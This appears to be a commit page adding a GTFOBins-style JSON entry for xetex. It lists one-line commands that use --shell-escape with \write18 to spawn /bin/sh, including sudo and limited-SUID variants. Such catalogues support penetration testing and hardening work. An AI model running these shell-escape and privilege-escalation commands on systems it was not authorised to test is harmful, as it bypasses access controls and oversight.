add data source for xetex

master
Mr. Robot 3 years ago committed by GitHub
parent 9048a2a6d5
commit 1e83606022
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,19 @@
{
"functions": {
"shell": [
{
"code": "xetex --shell-escape '\\write18{/bin/sh}\\end'\n"
}
],
"sudo": [
{
"code": "sudo xetex --shell-escape '\\write18{/bin/sh}\\end'\n"
}
],
"limited-suid": [
{
"code": "./xetex --shell-escape '\\write18{/bin/sh}\\end'\n"
}
]
}
}
Loading…
Cancel
Save